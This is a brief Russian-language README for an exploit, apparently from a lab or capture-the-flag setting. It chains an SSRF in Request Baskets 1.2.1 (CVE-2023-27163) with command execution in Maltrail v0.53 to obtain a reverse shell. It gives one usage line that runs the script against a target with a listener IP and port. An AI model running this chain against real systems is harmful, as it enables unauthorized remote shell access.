
Requests Baskets (CVE-2023-27163) и Mailtrail v0.53
Данный эксплойт использует SSRF-уязвимость в Requests Baskets v1.2.1, чтобы перенаправить внутреннее приложение, работающее на 127.0.0.1:80, на внешнее приложение по адресу /pwned. После того как приложение Mailtrail v0.53 будет перенаправлено, эксплойт выполнит команду reverse shell против него, и в течение нескольких секунд пользователь должен получить reverse shell на машине.
python3 ./exploit http://10.10.10.10:55555 LISTENER-IP LISTENER-PORT